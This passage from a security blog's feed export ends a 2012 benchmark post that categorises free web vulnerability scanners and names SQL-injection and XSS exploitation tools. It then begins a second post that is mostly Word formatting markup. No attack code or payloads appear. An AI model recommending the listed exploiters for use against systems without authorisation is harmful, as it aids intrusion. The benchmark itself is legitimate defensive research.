&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;Hexjector (by hkhexon)&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo6; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;Simple XSS Fuzzer [SiXFu] (by www.EvilFingers.com)&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo6; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;Mysqloit (by muhaimindz)&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo6; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;PHP Fuzzer (by RoMeO from DarkMindZ)&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo6; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;SQLi-Scanner (by Valentin Hoebel)&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo6; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;Etc.&lt;b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l2 level1 lfo6; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;Vulnerability
Detection Assisting Tools&lt;/u&gt;&lt;/b&gt; – tools that aid in discovering a
vulnerability, but do not detect the vulnerability themselves; for example:&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo6; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://labs.securitycompass.com/exploit-me/&quot;&gt;&lt;b&gt;Exploit-Me
Suite&lt;/b&gt;&lt;/a&gt;&lt;b&gt; (XSS-Me, SQL Inject-Me, Access-Me) &lt;/b&gt;&amp;nbsp;&lt;b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo6; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://xss.codeplex.com/wikipage?title=tutorial&quot;&gt;&lt;b&gt;Fiddler
X5s plugin&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo6; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;https://chrome.google.com/webstore/detail/kkopfbcgaebdaklghbnfmjeeonmabidj&quot;&gt;&lt;b&gt;XSSRays&lt;/b&gt;&lt;/a&gt;&lt;b&gt;
(chrome Addon)&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l2 level1 lfo6; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;Exploiters&lt;/u&gt; - &lt;/b&gt;tools
that can exploit vulnerabilities but have no independent ability to
automatically detect vulnerabilities on a large scale. Examples:&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo6; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;MultiInjector&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo6; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;XSS-Proxy-Scanner&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo6; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;Pangolin&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo6; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;FGInjector&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo6; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;Absinth&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo6; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;Safe3 SQL Injector&lt;/b&gt; (an exploitation tool with scanning
features (pentest mode) that are &lt;b&gt;not available&lt;/b&gt; in the free version).&lt;b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo6; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;etc&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l2 level1 lfo6; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;Exceptional Cases&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo6; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;SecurityQA Toolbar (iSec)&lt;/b&gt; – various lists and rumors
include this tool in the collection of free/open-source vulnerability scanners,
but I wasn’t able to obtain it from the vendor’s web site, or from any other
legitimate source, so I’m not really sure it fits the “free to use” category.&lt;b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72.0pt; mso-add-space: auto;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpLast&quot; style=&quot;margin-left: 72.0pt; mso-add-space: auto;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://sectooladdict.blogspot.com/feeds/3552660977046894029/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://sectooladdict.blogspot.com/2012/07/2012-web-application-scanner-benchmark.html#comment-form' title='14 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3792178847867987053/posts/default/3552660977046894029'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3792178847867987053/posts/default/3552660977046894029'/><link rel='alternate' type='text/html' href='http://sectooladdict.blogspot.com/2012/07/2012-web-application-scanner-benchmark.html' title='The 2012 Web Application Scanner Benchmark'/><author><name>Shay Chen</name><uri>http://www.blogger.com/profile/16490521389991462247</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiC9QLJKh4Z6I4puwxVoOzyuqVc4ZRYmL_XcS3dLCeIsRcdoEmwnZQejnW8__iitHgbTYcmCefW7UEtQPpZdbtqX0cnPCYn7Ws913obv19u44x89xHY8a-9JqfkdxyBXg/s220/n847114298_305931_3159.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQvPzVvNH07eO-pjY8QuQ4rdwg65G4SCv4l-NrpvVdHRi8uZq5XuNuBvfI3IJhey97qQCqbThSnfpcvAxiTqj3NmucveUsPqJnoHIUk4wT6bgZkCER1UejyF1m1BkSaisdyEVByBDv0FQ/s72-c/wavsep.png" height="72" width="72"/><thr:total>14</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3792178847867987053.post-8826741740120665116</id><published>2012-05-28T15:28:00.001-07:00</published><updated>2012-05-28T15:28:26.989-07:00</updated><title type='text'>Started Testing Scanners for the 2012 Benchmark!</title><content type='html'>&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;w:WordDocument&gt;
  &lt;w:View&gt;Normal&lt;/w:View&gt;
  &lt;w:Zoom&gt;0&lt;/w:Zoom&gt;
  &lt;w:TrackMoves/&gt;
  &lt;w:TrackFormatting/&gt;
  &lt;w:PunctuationKerning/&gt;
  &lt;w:ValidateAgainstSchemas/&gt;
  &lt;w:SaveIfXMLInvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;
  &lt;w:IgnoreMixedContent&gt;false&lt;/w:IgnoreMixedContent&gt;
  &lt;w:AlwaysShowPlaceholderText&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;
  &lt;w:DoNotPromoteQF/&gt;
  &lt;w:LidThemeOther&gt;EN-US&lt;/w:LidThemeOther&gt;
  &lt;w:LidThemeAsian&gt;X-NONE&lt;/w:LidThemeAsian&gt;
  &lt;w:LidThemeComplexScript&gt;HE&lt;/w:LidThemeComplexScript&gt;
  &lt;w:Compatibility&gt;
   &lt;w:BreakWrappedTables/&gt;
   &lt;w:SnapToGridInCell/&gt;
   &lt;w:WrapTextWithPunct/&gt;
   &lt;w:UseAsianBreakRules/&gt;
   &lt;w:DontGrowAutofit/&gt;
   &lt;w:SplitPgBreakAndParaMark/&gt;
   &lt;w:DontVertAlignCellWithSp/&gt;
   &lt;w:DontBreakConstrainedForcedTables/&gt;
   &lt;w:DontVertAlignInTxbx/&gt;
   &lt;w:Word11KerningPairs/&gt;
   &lt;w:CachedColBalance/&gt;
  &lt;/w:Compatibility&gt;
  &lt;w:BrowserLevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;
  &lt;m:mathPr&gt;
   &lt;m:mathFont m:val=&quot;Cambria Math&quot;/&gt;
   &lt;m:brkBin m:val=&quot;before&quot;/&gt;
   &lt;m:brkBinSub m:val=&quot;&amp;#45;-&quot;/&gt;
   &lt;m:smallFrac m:val=&quot;off&quot;/&gt;
   &lt;m:dispDef/&gt;
   &lt;m:lMargin m:val=&quot;0&quot;/&gt;
   &lt;m:rMargin m:val=&quot;0&quot;/&gt;
   &lt;m:defJc m:val=&quot;centerGroup&quot;/&gt;
   &lt;m:wrapIndent m:val=&quot;1440&quot;/&gt;
   &lt;m:intLim m:val=&quot;subSup&quot;/&gt;
   &lt;m:naryLim m:val=&quot;undOvr&quot;/&gt;
  &lt;/m:mathPr&gt;&lt;/w:WordDocument&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;w:LatentStyles DefLockedState=&quot;false&quot; DefUnhideWhenUsed=&quot;true&quot;
  DefSemiHidden=&quot;true&quot; DefQFormat=&quot;false&quot; DefPriority=&quot;99&quot;
  LatentStyleCount=&quot;267&quot;&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;0&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; QFormat=&quot;true&quot; Name=&quot;Normal&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;9&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; QFormat=&quot;true&quot; Name=&quot;heading 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;9&quot; QFormat=&quot;true&quot; Name=&quot;heading 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;9&quot; QFormat=&quot;true&quot; Name=&quot;heading 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;9&quot; QFormat=&quot;true&quot; Name=&quot;heading 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;9&quot; QFormat=&quot;true&quot; Name=&quot;heading 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;9&quot; QFormat=&quot;true&quot; Name=&quot;heading 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;9&quot; QFormat=&quot;true&quot; Name=&quot;heading 7&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;9&quot; QFormat=&quot;true&quot; Name=&quot;heading 8&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;9&quot; QFormat=&quot;true&quot; Name=&quot;heading 9&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;39&quot; Name=&quot;toc 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;39&quot; Name=&quot;toc 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;39&quot; Name=&quot;toc 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;39&quot; Name=&quot;toc 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;39&quot; Name=&quot;toc 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;39&quot; Name=&quot;toc 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;39&quot; Name=&quot;toc 7&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;39&quot; Name=&quot;toc 8&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;39&quot; Name=&quot;toc 9&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;35&quot; QFormat=&quot;true&quot; Name=&quot;caption&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;10&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; QFormat=&quot;true&quot; Name=&quot;Title&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;1&quot; Name=&quot;Default Paragraph Font&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;11&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; QFormat=&quot;true&quot; Name=&quot;Subtitle&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;22&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; QFormat=&quot;true&quot; Name=&quot;Strong&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;20&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; QFormat=&quot;true&quot; Name=&quot;Emphasis&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;59&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Table Grid&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; UnhideWhenUsed=&quot;false&quot; Name=&quot;Placeholder Text&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;1&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; QFormat=&quot;true&quot; Name=&quot;No Spacing&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;60&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light Shading&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;61&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light List&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;62&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light Grid&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;63&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Shading 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;64&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Shading 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;65&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium List 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;66&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium List 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;67&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;68&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;69&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;70&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Dark List&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;71&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful Shading&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;72&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful List&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;73&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful Grid&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;60&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light Shading Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;61&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light List Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;62&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light Grid Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;63&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Shading 1 Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;64&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Shading 2 Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;65&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium List 1 Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; UnhideWhenUsed=&quot;false&quot; Name=&quot;Revision&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;34&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; QFormat=&quot;true&quot; Name=&quot;List Paragraph&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;29&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; QFormat=&quot;true&quot; Name=&quot;Quote&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;30&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; QFormat=&quot;true&quot; Name=&quot;Intense Quote&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;66&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium List 2 Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;67&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 1 Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;68&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 2 Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;69&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 3 Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;70&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Dark List Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;71&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful Shading Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;72&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful List Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;73&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful Grid Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;60&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light Shading Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;61&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light List Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;62&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light Grid Accent 2&quot;/&gt;
